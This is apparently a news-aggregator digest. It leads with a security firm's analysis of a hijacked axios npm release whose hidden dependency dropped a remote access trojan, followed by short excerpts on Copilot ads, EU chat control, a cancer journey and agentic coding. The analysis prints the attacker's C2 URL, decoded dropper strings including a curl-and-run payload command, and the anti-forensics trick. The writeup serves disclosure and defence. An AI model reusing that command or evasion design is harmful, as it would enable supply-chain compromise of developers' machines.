10 interesting stories served every morning and every evening.




1 1,712 shares, 96 trendiness

Malicious Versions Drop Remote Access Trojan

Hijacked main­tainer ac­count used to pub­lish poi­soned ax­ios re­leases in­clud­ing 1.14.1 and 0.30.4. The at­tacker in­jected a hid­den de­pen­dency that drops a cross plat­form RAT. We are ac­tively in­ves­ti­gat­ing and will up­date this post with a full tech­ni­cal analy­sis. StepSecurity is host­ing a com­mu­nity town hall on this in­ci­dent on April 1st at 10:00 AM PT - Register Here.axios is the most pop­u­lar JavaScript HTTP client li­brary with over 100 mil­lion weekly down­loads. On March 30, 2026, StepSecurity iden­ti­fied two ma­li­cious ver­sions of the widely used ax­ios HTTP client li­brary pub­lished to npm: ax­ios@1.14.1 and ax­ios@0.30.4. The ma­li­cious ver­sions in­ject a new de­pen­dency, plain-crypto-js@4.2.1, which is never im­ported any­where in the ax­ios source code. Its sole pur­pose is to ex­e­cute a postin­stall script that acts as a cross plat­form re­mote ac­cess tro­jan (RAT) drop­per, tar­get­ing ma­cOS, Windows, and Linux. The drop­per con­tacts a live com­mand and con­trol server and de­liv­ers plat­form spe­cific sec­ond stage pay­loads. After ex­e­cu­tion, the mal­ware deletes it­self and re­places its own pack­age.json with a clean ver­sion to evade foren­sic de­tec­tion.If you have in­stalled ax­ios@1.14.1 or ax­ios@0.30.4, as­sume your sys­tem is com­pro­misedThere are zero lines of ma­li­cious code in­side ax­ios it­self, and that’s ex­actly what makes this at­tack so dan­ger­ous. Both poi­soned re­leases in­ject a fake de­pen­dency, plain-crypto-js@4.2.1, a pack­age never im­ported any­where in the ax­ios source, whose sole pur­pose is to run a postin­stall script that de­ploys a cross-plat­form re­mote ac­cess tro­jan. The drop­per con­tacts a live com­mand-and-con­trol server, de­liv­ers sep­a­rate sec­ond-stage pay­loads for ma­cOS, Windows, and Linux, then erases it­self and re­places its own pack­age.json with a clean de­coy. A de­vel­oper who in­spects their node_­mod­ules folder af­ter the fact will find no in­di­ca­tion any­thing went wrong.This was not op­por­tunis­tic. It was pre­ci­sion. The ma­li­cious de­pen­dency was staged 18 hours in ad­vance. Three pay­loads were pre-built for three op­er­at­ing sys­tems. Both re­lease branches were poi­soned within 39 min­utes of each other. Every ar­ti­fact was de­signed to self-de­struct. Within two sec­onds of npm in­stall, the mal­ware was al­ready call­ing home to the at­tack­er’s server be­fore npm had even fin­ished re­solv­ing de­pen­den­cies. This is among the most op­er­a­tionally so­phis­ti­cated sup­ply chain at­tacks ever doc­u­mented against a top-10 npm pack­age.These com­pro­mises were de­tected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have re­spon­si­bly dis­closed the is­sue to the pro­ject main­tain­ers.StepSe­cu­rity Harden-Runner, whose com­mu­nity tier is free for pub­lic re­pos and is used by over 12,000 pub­lic repos­i­to­ries, de­tected the com­pro­mised ax­ios pack­age mak­ing anom­alous out­bound con­nec­tions to the at­tack­er’s C2 do­main across mul­ti­ple open source pro­jects. For ex­am­ple, Harden-Runner flagged the C2 call­back to sfr­clak.com:8000 dur­ing a rou­tine CI run in the back­stage repos­i­tory, one of the most widely used de­vel­oper por­tal frame­works. The Backstage team has con­firmed that this work­flow is in­ten­tion­ally sand­boxed and the ma­li­cious pack­age in­stall does not im­pact the pro­ject. The con­nec­tion was au­to­mat­i­cally marked as anom­alous be­cause it had never ap­peared in any prior work­flow run. Harden-Runner in­sights for com­mu­nity tier pro­jects are pub­lic by de­sign, al­low­ing any­one to ver­ify the de­tec­tion: https://​app.stepse­cu­rity.io/​github/​back­stage/​back­stage/​ac­tions/​runs/​23775668703?tab=net­work-events

[Community Webinar] ax­ios Compromised on npm: What We Know, What You Should Do

Join StepSecurity on April 1st at 10:00 AM PT for a live com­mu­nity brief­ing on the ax­ios sup­ply chain at­tack. We’ll walk through the full at­tack chain, in­di­ca­tors of com­pro­mise, re­me­di­a­tion steps, and open it up for Q&A.

Register for the we­bi­nar →

The at­tack was pre-staged across roughly 18 hours, with the ma­li­cious de­pen­dency seeded on npm be­fore the ax­ios re­leases to avoid brand-new pack­age” alarms from se­cu­rity scan­ners:

plain-crypto-js@4.2.0 pub­lished by nr­wise@pro­ton.me — a clean de­coy con­tain­ing a full copy of the le­git­i­mate crypto-js source, no postin­stall hook. Its sole pur­pose is to es­tab­lish npm pub­lish­ing his­tory so the pack­age does not ap­pear as a zero-his­tory ac­count dur­ing later in­spec­tion.

plain-crypto-js@4.2.1 pub­lished by nr­wise@pro­ton.me — ma­li­cious pay­load added. The postin­stall: node setup.js” hook and ob­fus­cated drop­per are in­tro­duced.

ax­ios@1.14.1 pub­lished by com­pro­mised ja­son­saay­man ac­count (email: if­stap@pro­ton.me) — in­jects plain-crypto-js@4.2.1 as a run­time de­pen­dency, tar­get­ing the mod­ern 1.x user base.

ax­ios@0.30.4 pub­lished by the same com­pro­mised ac­count — iden­ti­cal in­jec­tion into the legacy 0.x branch, pub­lished 39 min­utes later to max­i­mize cov­er­age across both re­lease lines.

npm un­pub­lishes ax­ios@1.14.1 and ax­ios@0.30.4. Both ver­sions are re­moved from the reg­istry and the lat­est dist-tag re­verts to 1.14.0. ax­ios@1.14.1 had been live for ap­prox­i­mately 2 hours 53 min­utes; ax­ios@0.30.4 for ap­prox­i­mately 2 hours 15 min­utes. Timestamp is in­ferred from the ax­ios reg­istry doc­u­men­t’s mod­i­fied field (03:15:30Z) — npm does not ex­pose a ded­i­cated per-ver­sion un­pub­lish time­stamp in its pub­lic API.

npm ini­ti­ates a se­cu­rity hold on plain-crypto-js, be­gin­ning the process of re­plac­ing the ma­li­cious pack­age with an npm se­cu­rity-holder stub.

npm pub­lishes the se­cu­rity-holder stub plain-crypto-js@0.0.1-se­cu­rity.0 un­der the npm@npmjs.com ac­count, for­mally re­plac­ing the ma­li­cious pack­age on the reg­istry. plain-crypto-js@4.2.1 had been live for ap­prox­i­mately 4 hours 27 min­utes. Attempting to in­stall any ver­sion of plain-crypto-js now re­turns the se­cu­rity no­tice.

The at­tacker com­pro­mised the ja­son­saay­man npm ac­count, the pri­mary main­tainer of the ax­ios pro­ject. The ac­coun­t’s reg­is­tered email was changed to if­stap@pro­ton.me — an at­tacker-con­trolled ProtonMail ad­dress. Using this ac­cess, the at­tacker pub­lished ma­li­cious builds across both the 1.x and 0.x re­lease branches si­mul­ta­ne­ously, max­i­miz­ing the num­ber of pro­jects ex­posed.Both ax­ios@1.14.1 and ax­ios@0.30.4 are recorded in the npm reg­istry as pub­lished by ja­son­saay­man, mak­ing them in­dis­tin­guish­able from le­git­i­mate re­leases at a glance. Both ver­sions were pub­lished us­ing the com­pro­mised npm cre­den­tials of a lead ax­ios main­tainer, by­pass­ing the pro­jec­t’s nor­mal GitHub Actions CI/CD pipeline.A crit­i­cal foren­sic sig­nal is vis­i­ble in the npm reg­istry meta­data. Every le­git­i­mate ax­ios 1.x re­lease is pub­lished via GitHub Actions with npm’s OIDC Trusted Publisher mech­a­nism, mean­ing the pub­lish is cryp­to­graph­i­cally tied to a ver­i­fied GitHub Actions work­flow. ax­ios@1.14.1 breaks that pat­tern en­tirely — pub­lished man­u­ally via a stolen npm ac­cess to­ken with no OIDC bind­ing and no git­Head:// ax­ios@1.14.0 — LEGITIMATE

_npmUser”: {

name”: GitHub Actions”,

email”: npm-oidc-no-re­ply@github.com,

trustedPublisher”: {

id”: github”,

oidcConfigId”: oidc:9061ef30-3132-49f4-b28c-9338d192a1a9″

// ax­ios@1.14.1 — MALICIOUS

_npmUser”: {

name”: jasonsaayman”,

email”: if­stap@pro­ton.me

// no trust­ed­Pub­lisher, no git­Head, no cor­re­spond­ing GitHub com­mit or tag

}There is no com­mit or tag in the ax­ios GitHub repos­i­tory that cor­re­sponds to 1.14.1. The re­lease ex­ists only on npm. The OIDC to­ken that le­git­i­mate re­leases use is ephemeral and scoped to the spe­cific work­flow — it can­not be stolen. The at­tacker must have ob­tained a long-lived clas­sic npm ac­cess to­ken for the ac­count.Be­fore pub­lish­ing the ma­li­cious ax­ios ver­sions, the at­tacker pre-staged plain-crypto-js@4.2.1 from ac­count nr­wise@pro­ton.me. This pack­age:Mas­quer­ades as crypto-js with an iden­ti­cal de­scrip­tion and repos­i­tory URL point­ing to the le­git­i­mate brix/​crypto-js GitHub repos­i­to­ryCon­tains postinstall”: node setup.js” — the hook that fires the RAT drop­per on in­stall­Pre-stages a clean pack­age.json stub in a file named pack­age.md for ev­i­dence de­struc­tion af­ter ex­e­cu­tion­The de­coy ver­sion (4.2.0) was pub­lished 18 hours ear­lier to es­tab­lish pub­lish­ing his­tory - a clean pack­age in the reg­istry that makes nr­wise look like a le­git­i­mate main­tainer.What changed be­tween 4.2.0 (decoy) and 4.2.1 (malicious)A com­plete file-level com­par­i­son be­tween plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 re­veals ex­actly three dif­fer­ences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is iden­ti­cal be­tween the two ver­sions:

The 56 crypto source files are not just sim­i­lar; they are bit-for-bit iden­ti­cal to the cor­re­spond­ing files in the le­git­i­mate crypto-js@4.2.0 pack­age pub­lished by Evan Vosberg. The at­tacker made no mod­i­fi­ca­tions to the cryp­to­graphic li­brary code what­so­ever. This was in­ten­tional: any diff-based analy­sis com­par­ing plain-crypto-js against crypto-js would find noth­ing sus­pi­cious in the li­brary files and would fo­cus at­ten­tion on pack­age.json — where the postin­stall hook looks, at a glance, like a stan­dard build or setup task.The anti-foren­sics stub (package.md) de­serves par­tic­u­lar at­ten­tion. After setup.js runs, it re­names pack­age.md to pack­age.json. The stub re­ports ver­sion 4.2.0 — not 4.2.1:// Contents of pack­age.md (the clean re­place­ment stub)

name”: plain-crypto-js”,

version”: 4.2.0″, // ← re­ports 4.2.0, not 4.2.1 — de­lib­er­ate mis­match

description”: JavaScript li­brary of crypto stan­dards.”,

license”: MIT,

author”: { name”: Evan Vosberg”, url”: http://​github.com/​evan­vos­berg },

homepage”: http://​github.com/​brix/​crypto-js,

repository”: { type”: git”, url”: http://​github.com/​brix/​crypto-js.git },

main”: index.js”,

// No scripts” key — no postin­stall, no test

dependencies”: {}

}This cre­ates a sec­ondary de­cep­tion layer. After in­fec­tion, run­ning npm list in the pro­ject di­rec­tory will re­port plain-crypto-js@4.2.0 — be­cause npm list reads the ver­sion field from the in­stalled pack­age.json, which now says 4.2.0. An in­ci­dent re­spon­der check­ing in­stalled pack­ages would see a ver­sion num­ber that does not match the ma­li­cious 4.2.1 ver­sion they were told to look for, po­ten­tially lead­ing them to con­clude the sys­tem was not com­pro­mised.# What npm list re­ports POST-infection (after the pack­age.json swap):

$ npm list plain-crypto-js

mypro­ject@1.0.0

└── plain-crypto-js@4.2.0 # ← re­ports 4.2.0, not 4.2.1

# but the drop­per al­ready ran as 4.2.1

# The re­li­able check is the DIRECTORY PRESENCE, not the ver­sion num­ber:

$ ls node_­mod­ules/​plain-crypto-js

aes.js ci­pher-core.js core.js …

# If this di­rec­tory ex­ists at all, the drop­per ran.

# plain-crypto-js is not a de­pen­dency of ANY le­git­i­mate ax­ios ver­sion.The dif­fer­ence be­tween the real crypto-js@4.2.0 and the ma­li­cious plain-crypto-js@4.2.1 is a sin­gle field in pack­age.json:// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)

name”: crypto-js”,

version”: 4.2.0″,

description”: JavaScript li­brary of crypto stan­dards.”,

author”: Evan Vosberg”,

homepage”: http://​github.com/​brix/​crypto-js,

scripts”: {

test”: grunt” // ← no postin­stall

// plain-crypto-js@4.2.1 (MALICIOUSnr­wise@pro­ton.me)

name”: plain-crypto-js”, // ← dif­fer­ent name, every­thing else cloned

version”: 4.2.1″, // ← ver­sion one ahead of the real pack­age

description”: JavaScript li­brary of crypto stan­dards.”,

author”: { name”: Evan Vosberg” }, // ← fraud­u­lent use of real au­thor name

homepage”: http://​github.com/​brix/​crypto-js, // ← real repo, wrong pack­age

scripts”: {

test”: grunt”,

postinstall”: node setup.js” // ← THE ONLY DIFFERENCE. The en­tire weapon.

}The at­tacker pub­lished ax­ios@1.14.1 and ax­ios@0.30.4 with plain-crypto-js: ^4.2.1” added as a run­time de­pen­dency — a pack­age that has never ap­peared in any le­git­i­mate ax­ios re­lease. The diff is sur­gi­cal: every other de­pen­dency is iden­ti­cal to the prior clean ver­sion.When a de­vel­oper runs npm in­stall ax­ios@1.14.1, npm re­solves the de­pen­dency tree and in­stalls plain-crypto-js@4.2.1 au­to­mat­i­cally. npm then ex­e­cutes plain-crypto-js’s postin­stall script, launch­ing the drop­per.Phan­tom de­pen­dency: A grep across all 86 files in ax­ios@1.14.1 con­firms that plain-crypto-js is never im­ported or re­quire()’d any­where in the ax­ios source code. It is added to pack­age.json only to trig­ger the postin­stall hook. A de­pen­dency that ap­pears in the man­i­fest but has zero us­age in the code­base is a high-con­fi­dence in­di­ca­tor of a com­pro­mised re­lease.The Surgical Precision of the InjectionA com­plete bi­nary diff be­tween ax­ios@1.14.0 and ax­ios@1.14.1 across all 86 files (excluding source maps) re­veals that ex­actly one file changed: pack­age.json. Every other file — all 85 li­brary source files, type de­f­i­n­i­tions, README, CHANGELOG, and com­piled dist bun­dles — is bit-for-bit iden­ti­cal be­tween the two ver­sions.# File diff: ax­ios@1.14.0 vs ax­ios@1.14.1 (86 files, source maps ex­cluded)

DIFFERS: pack­age.json

Total dif­fer­ing files: 1

Files only in 1.14.1: (none)

Files only in 1.14.0: (none)# –- ax­ios/​pack­age.json (1.14.0)

# +++ ax­ios/​pack­age.json (1.14.1)

- version”: 1.14.0″,

+ version”: 1.14.1″,

scripts”: {

fix”: eslint –fix lib/**/*.​js”,

- prepare”: husky”

dependencies”: {

follow-redirects”: ^2.1.0″,

form-data”: ^4.0.1″,

proxy-from-env”: ^2.1.0″,

+ plain-crypto-js”: ^4.2.1″

}Two changes are vis­i­ble: the ver­sion bump (1.14.0 → 1.14.1) and the ad­di­tion of plain-crypto-js. There is also a third, less ob­vi­ous change: the prepare”: husky” script was re­moved. husky is the git hook man­ager used by the ax­ios pro­ject to en­force pre-com­mit checks. Its re­moval from the scripts sec­tion is con­sis­tent with a man­ual pub­lish that by­passed the nor­mal de­vel­op­ment work­flow — the at­tacker edited pack­age.json di­rectly with­out go­ing through the pro­jec­t’s stan­dard re­lease tool­ing, which would have re-added the husky pre­pare script.The same analy­sis ap­plies to ax­ios@0.30.3 → ax­ios@0.30.4:# –- ax­ios/​pack­age.json (0.30.3)

# +++ ax­ios/​pack­age.json (0.30.4)

- version”: 0.30.3″,

+ version”: 0.30.4″,

dependencies”: {

follow-redirects”: ^1.15.4″,

form-data”: ^4.0.4″,

proxy-from-env”: ^1.1.0″,

+ plain-crypto-js”: ^4.2.1″

}Again — ex­actly one sub­stan­tive change: the ma­li­cious de­pen­dency in­jec­tion. The ver­sion bump it­self (from 0.30.3 to 0.30.4) is sim­ply the re­quired npm ver­sion in­cre­ment to pub­lish a new re­lease; it car­ries no func­tional sig­nif­i­cance.setup.js is a sin­gle mini­fied file em­ploy­ing a two-layer ob­fus­ca­tion scheme de­signed to evade sta­tic analy­sis tools and con­fuse hu­man re­view­ers.All sen­si­tive strings — mod­ule names, OS iden­ti­fiers, shell com­mands, the C2 URL, and file paths — are stored as en­coded val­ues in an ar­ray named stq[]. Two func­tions de­code them at run­time:_tran­s_1(x, r) — XOR ci­pher. The key OrDeR_7077” is parsed through JavaScript’s Number(): al­pha­betic char­ac­ters pro­duce NaN, which in bit­wise op­er­a­tions be­comes 0. Only the dig­its 7, 0, 7, 7 in po­si­tions 6–9 sur­vive, giv­ing an ef­fec­tive key of [0,0,0,0,0,0,7,0,7,7]. Each char­ac­ter at po­si­tion r is de­coded as:char­Code XOR key[(7 × r × r) % 10] XOR 333_trans_2(x, r) — Outer layer. Reverses the en­coded string, re­places _ with =, base64-de­codes the re­sult (interpreting the bytes as UTF-8 to re­cover Unicode code points), then passes the out­put through _trans_1.The drop­per’s en­try point is _entry(“6202033″), where 6202033 is the C2 URL path seg­ment. The full C2 URL is: http://​sfr­clak.com:8000/​6202033StepSe­cu­rity fully de­coded every en­try in the stq[] ar­ray. The re­cov­ered plain­text re­veals the com­plete at­tack:stq[0] → child_process” // shell ex­e­cu­tion

stq[1] → os” // plat­form de­tec­tion

stq[2] → fs” // filesys­tem op­er­a­tions

stq[3] → http://​sfr­clak.com:8000/ // C2 base URL

stq[5] → win32” // Windows plat­form iden­ti­fier

stq[6] → darwin” // ma­cOS plat­form iden­ti­fier

stq[12] → curl -o /tmp/ld.py -d pack­ages.npm.org/​pro­duct2 -s SCR_LINK && no­hup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &”

stq[13] → package.json” // deleted af­ter ex­e­cu­tion

stq[14] → package.md” // clean stub re­named to pack­age.json

stq[15] → .exe”

stq[16] → .ps1″

stq[17] → .vbs”The com­plete at­tack path from npm in­stall to C2 con­tact and cleanup, across all three tar­get plat­forms.With all strings de­coded, the drop­per’s full logic can be re­con­structed and an­no­tated. The fol­low­ing is a de-ob­fus­cated, com­mented ver­sion of the _entry() func­tion that con­sti­tutes the en­tire drop­per pay­load. Original vari­able names are pre­served; com­ments are added for clar­ity.// setup.js — de-ob­fus­cated and an­no­tated

// SHA-256: e10b1­fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09

...

Read the original on www.stepsecurity.io »

2 1,482 shares, 58 trendiness

copilot edited an ad into my pr

After a team mem­ber sum­moned Copilot to cor­rect a typo in a PR of mine, Copilot edited my PR de­scrip­tion to in­clude and ad for it­self and Raycast.

This is hor­rific. I knew this kind of bull­shit would hap­pen even­tu­ally, but I did­n’t ex­pect it so soon.

Here is how plat­forms die: first, they are good to their users; then they abuse their users to make things bet­ter for their busi­ness cus­tomers; fi­nally, they abuse those busi­ness cus­tomers to claw back all the value for them­selves. Then, they die.

...

Read the original on notes.zachmanson.com »

3 1,402 shares, 49 trendiness

Protect Digital Privacy in the EU

Skip to main con­tent

🚨 The Conservatives (EPP) are at­tempt­ing to force a new vote on Thursday (26th), seek­ing to re­verse Parliament’s NO on in­dis­crim­i­nate scan­ning. This is a di­rect at­tack on democ­racy and bla­tant dis­re­gard for your right to pri­vacy. No means no. Take ac­tion now!

...

Read the original on fightchatcontrol.eu »

4 1,279 shares, 49 trendiness

Cancer

I’ve taken agency in the treat­ment of my bone can­cer (osteosarcoma in the T5 ver­te­brae of the up­per spine). After I’ve ran out of stan­dard of care treat­ment op­tions and there were no tri­als avail­able for me I’ve started do­ing: max­i­mum di­ag­nos­tics, cre­ated new treat­ments, started do­ing treat­ments in par­al­lel, and scal­ing this for oth­ers.

Elliot Hershberg wrote a great and ex­ten­sive ar­ti­cle about my can­cer jour­ney.

My can­cer jour­ney deck is em­bed­ded be­low, there also is a record­ing of an OpenAI Forum pre­sen­ta­tion. The com­pa­nies we are build­ing to scale this ap­proach for oth­ers can be found at evenone.ven­tures. Please scroll fur­ther on this page for my data and other in­for­ma­tion.

I think the med­ical in­dus­try can be more pa­tient first, see this great ar­ti­cle by Ruxandra https://​www.writ­in­gruxan­dra­bio.com/​p/​the-bu­reau­cracy-block­ing-the-chance

For my data please see https://​os­teosarc.com/ that in­cludes my treat­ment time­line and a data overview doc with 25TB of pub­licly read­able Google Cloud buck­ets.

Please sub­scribe to my mail­ing list

...

Read the original on sytse.com »

5 1,015 shares, 41 trendiness

Thoughts on slowing the fuck down

It’s been about a year since cod­ing agents ap­peared on the scene that could ac­tu­ally build you full pro­jects. There were pre­cur­sors like Aider and early Cursor, but they were more as­sis­tant than agent. The new gen­er­a­tion is en­tic­ing, and a lot of us have spent a lot of free time build­ing all the pro­jects we al­ways wanted to build but never had time to.

And I think that’s fine. Spending your free time build­ing things is su­per en­joy­able, and most of the time you don’t re­ally have to care about code qual­ity and main­tain­abil­ity. It also gives you a way to learn a new tech stack if you so want.

During the Christmas break, both Anthropic and OpenAI handed out some free­bies to hook peo­ple to their ad­dic­tive slot ma­chines. For many, it was the first time they ex­pe­ri­enced the magic of agen­tic cod­ing. The fold’s get­ting big­ger.

Coding agents are now also in­tro­duced to pro­duc­tion code­bases. After 12 months, we are now be­gin­ning to see the ef­fects of all that progress”. Here’s my cur­rent view.

While all of this is anec­do­tal, it sure feels like soft­ware has be­come a brit­tle mess, with 98% up­time be­com­ing the norm in­stead of the ex­cep­tion, in­clud­ing for big ser­vices. And user in­ter­faces have the weird­est fuck­ing bugs that you’d think a QA team would catch. I give you that that’s been the case for longer than agents ex­ist. But we seem to be ac­cel­er­at­ing.

We don’t have ac­cess to the in­ter­nals of com­pa­nies. But every now and then some­thing slips through to some news re­porter. Like this sup­posed AI caused out­age at AWS. Which AWS im­me­di­ately corrected”. Only to then fol­low up in­ter­nally with a 90-day re­set.

Satya Nadella, the CEO of Microsoft, has been go­ing on about how much code is now be­ing writ­ten by AI at Microsoft. While we don’t have di­rect ev­i­dence, there sure is a feel­ing that Windows is go­ing down the shit­ter. Microsoft it­self seems to agree, based on this fine blog post.

Companies claim­ing 100% of their pro­duc­t’s code is now writ­ten by AI con­sis­tently put out the worst garbage you can imag­ine. Not point­ing fin­gers, but mem­ory leaks in the gi­ga­bytes, UI glitches, bro­ken-ass fea­tures, crashes: that is not the seal of qual­ity they think it is. And it’s def­i­nitely not good ad­ver­tis­ing for the fever dream of hav­ing your agents do all the work for you.

Through the grapevine you hear more and more peo­ple, from soft­ware com­pa­nies small and large, say­ing they have agen­ti­cally coded them­selves into a cor­ner. No code re­view, de­sign de­ci­sions del­e­gated to the agent, a gazil­lion fea­tures no­body asked for. That’ll do it.

We have ba­si­cally given up all dis­ci­pline and agency for a sort of ad­dic­tion, where your high­est goal is to pro­duce the largest amount of code in the short­est amount of time. Consequences be damned.

You’re build­ing an or­ches­tra­tion layer to com­mand an army of au­tonomous agents. You in­stalled Beads, com­pletely obliv­i­ous to the fact that it’s ba­si­cally unin­stal­lable mal­ware. The in­ter­net told you to. That’s how you should work or you’re ngmi. You’re ral­ph­ing the loop. Look, Anthropic built a C com­piler with an agent swarm. It’s kind of bro­ken, but surely the next gen­er­a­tion of LLMs can fix it. Oh my god, Cursor built a browser with a bat­tal­ion of agents. Yes, of course, it’s not re­ally work­ing and it needed a hu­man to spin the wheel a lit­tle bit every now and then. But surely the next gen­er­a­tion of LLMs will fix it. Pinky promise! Distribute, di­vide and con­quer, au­ton­omy, dark fac­to­ries, soft­ware is solved in the next 6 months. SaaS is dead, my grandma just had her Claw build her own Shopify!

Now again, this can work for your side pro­ject barely any­one is us­ing, in­clud­ing your­self. And hey, maybe there’s some­body out there who can ac­tu­ally make this work for a soft­ware prod­uct that’s not a steam­ing pile of garbage and is used by ac­tual hu­mans in anger.

If that’s you, more power to you. But at least among my cir­cle of peers I have yet to find ev­i­dence that this kind of shit works. Maybe we all have skill is­sues.

The prob­lem with agents is that they make er­rors. Which is fine, hu­mans also make er­rors. Maybe they are just cor­rect­ness er­rors. Easy to iden­tify and fix. Add a re­gres­sion test on top for bonus points. Or maybe it’s a code smell your lin­ter does­n’t catch. A use­less method here, a type that does­n’t make sense, du­pli­cated code over there. On their own, these are harm­less. A hu­man will also do such boo­boos.

But clankers aren’t hu­mans. A hu­man makes the same er­ror a few times. Eventually they learn not to make it again. Either be­cause some­one starts scream­ing at them or be­cause they’re on a gen­uine learn­ing path.

An agent has no such learn­ing abil­ity. At least not out of the box. It will con­tinue mak­ing the same er­rors over and over again. Depending on the train­ing data it might also come up with glo­ri­ous new in­ter­po­la­tions of dif­fer­ent er­rors.

Now you can try to teach your agent. Tell it to not make that boo­boo again in your AGENTS.md. Concoct the most com­plex mem­ory sys­tem and have it look up pre­vi­ous er­rors and best prac­tices. And that can be ef­fec­tive for a spe­cific cat­e­gory of er­rors. But it also re­quires you to ac­tu­ally ob­serve the agent mak­ing that er­ror.

There’s a much more im­por­tant dif­fer­ence be­tween clanker and hu­man. A hu­man is a bot­tle­neck. A hu­man can­not shit out 20,000 lines of code in a few hours. Even if the hu­man cre­ates such boo­boos at high fre­quency, there’s only so many boo­boos the hu­man can in­tro­duce in a code­base per day. The boo­boos will com­pound at a very slow rate. Usually, if the boo­boo pain gets too big, the hu­man, who hates pain, will spend some time fix­ing up the boo­boos. Or the hu­man gets fired and some­one else fixes up the boo­boos. So the pain goes away.

With an or­ches­trated army of agents, there is no bot­tle­neck, no hu­man pain. These tiny lit­tle harm­less boo­boos sud­denly com­pound at a rate that’s un­sus­tain­able. You have re­moved your­self from the loop, so you don’t even know that all the in­no­cent boo­boos have formed a mon­ster of a code­base. You only feel the pain when it’s too late.

Then one day you turn around and want to add a new fea­ture. But the ar­chi­tec­ture, which is largely boo­boos at this point, does­n’t al­low your army of agents to make the change in a func­tion­ing way. Or your users are scream­ing at you be­cause some­thing in the lat­est re­lease broke and deleted some user data.

You re­al­ize you can no longer trust the code­base. Worse, you re­al­ize that the gazil­lions of unit, snap­shot, and e2e tests you had your clankers write are equally un­trust­wor­thy. The only thing that’s still a re­li­able mea­sure of does this work” is man­u­ally test­ing the prod­uct. Congrats, you fucked your­self (and your com­pany).

You have zero fuck­ing idea what’s go­ing on be­cause you del­e­gated all your agency to your agents. You let them run free, and they are mer­chants of com­plex­ity. They have seen many bad ar­chi­tec­tural de­ci­sions in their train­ing data and through­out their RL train­ing. You have told them to ar­chi­tect your ap­pli­ca­tion. Guess what the re­sult is?

An im­mense amount of com­plex­ity, an amal­gam of ter­ri­ble cargo cult industry best prac­tices”, that you did­n’t rein in be­fore it was too late. But it’s worse than that.

Your agents never see each oth­er’s runs, never get to see all of your code­base, never get to see all the de­ci­sions that were made by you or other agents be­fore they make a change. As such, an agen­t’s de­ci­sions are al­ways lo­cal, which leads to the ex­act boo­boos de­scribed above. Immense amounts of code du­pli­ca­tion, ab­strac­tions for ab­strac­tions’ sake.

All of this com­pounds into an un­re­cov­er­able mess of com­plex­ity. The ex­act same mess you find in hu­man-made en­ter­prise code­bases. Those ar­rive at that state be­cause the pain is dis­trib­uted over a mas­sive amount of peo­ple. The in­di­vid­ual suf­fer­ing does­n’t pass the thresh­old of I need to fix this”. The in­di­vid­ual might not even have the means to fix things. And or­ga­ni­za­tions have su­per high pain tol­er­ance. But hu­man-made en­ter­prise code­bases take years to get there. The or­ga­ni­za­tion slowly evolves along with the com­plex­ity in a de­mented kind of syn­ergy and learns how to deal with it.

With agents and a team of 2 hu­mans, you can get to that com­plex­ity within weeks.

So now you hope your agents can fix the mess, refac­tor it, make it pris­tine. But your agents can also no longer deal with it. Because the code­base and com­plex­ity are too big, and they only ever have a lo­cal view of the mess.

And I’m not just talk­ing about con­text win­dow size or long con­text at­ten­tion mech­a­nisms fail­ing at the sight of a 1 mil­lion lines of code mon­ster. Those are ob­vi­ous tech­ni­cal lim­i­ta­tions. It’s more de­vi­ous than that.

Before your agent can try and help fix the mess, it needs to find all the code that needs chang­ing and all ex­ist­ing code it can reuse. We call that agen­tic search. How the agent does that de­pends on the tools it has. You can give it a Bash tool so it can rip­grep its way through the code­base. You can give it some queryable code­base in­dex, an LSP server, a vec­tor data­base. In the end it does­n’t mat­ter much. The big­ger the code­base, the lower the re­call. Low re­call means that your agent will, in fact, not find all the code it needs to do a good job.

This is also why those code smell boo­boos hap­pen in the first place. The agent misses ex­ist­ing code, du­pli­cates things, in­tro­duces in­con­sis­ten­cies. And then they blos­som into a beau­ti­ful shit flower of com­plex­ity.

How do we avoid all of this?

Coding agents are sirens, lur­ing you in with their speed of code gen­er­a­tion and jagged in­tel­li­gence, of­ten com­plet­ing a sim­ple task with high qual­ity at break­neck ve­loc­ity. Things start falling apart when you think: Oh golly, this thing is great. Computer, do my work!”.

There’s noth­ing wrong with del­e­gat­ing tasks to agents, ob­vi­ously. Good agent tasks share a few prop­er­ties: they can be scoped so the agent does­n’t need to un­der­stand the full sys­tem. The loop can be closed, that is, the agent has a way to eval­u­ate its own work. The out­put is­n’t mis­sion crit­i­cal, just some ad hoc tool or in­ter­nal piece of soft­ware no­body’s life or rev­enue de­pends on. Or you just need a rub­ber duck to bounce ideas against, which ba­si­cally means bounc­ing your idea against the com­pressed wis­dom of the in­ter­net and syn­thetic train­ing data. If any of that ap­plies, you found the per­fect task for the agent, pro­vided that you as the hu­man are the fi­nal qual­ity gate.

Karpathy’s auto-re­search ap­plied to speed­ing up startup time of your app? Great! As long as you un­der­stand that the code it spits out is not pro­duc­tion-ready at all. Auto-research works be­cause you give it an eval­u­a­tion func­tion that lets the agent mea­sure its work against some met­ric, like startup time or loss. But that eval­u­a­tion func­tion only cap­tures a very nar­row met­ric. The agent will hap­pily ig­nore any met­rics not cap­tured by the eval­u­a­tion func­tion, such as code qual­ity, com­plex­ity, or even cor­rect­ness, if your eval­u­a­tion func­tion is foo­bar.

The point is: let the agent do the bor­ing stuff, the stuff that won’t teach you any­thing new, or try out dif­fer­ent things you’d oth­er­wise not have time for. Then you eval­u­ate what it came up with, take the ideas that are ac­tu­ally rea­son­able and cor­rect, and fi­nal­ize the im­ple­men­ta­tion. Yes, sure, you can also use an agent for that fi­nal step.

And I would like to sug­gest that slow­ing the fuck down is the way to go. Give your­self time to think about what you’re ac­tu­ally build­ing and why. Give your­self an op­por­tu­nity to say, fuck no, we don’t need this. Set your­self lim­its on how much code you let the clanker gen­er­ate per day, in line with your abil­ity to ac­tu­ally re­view the code.

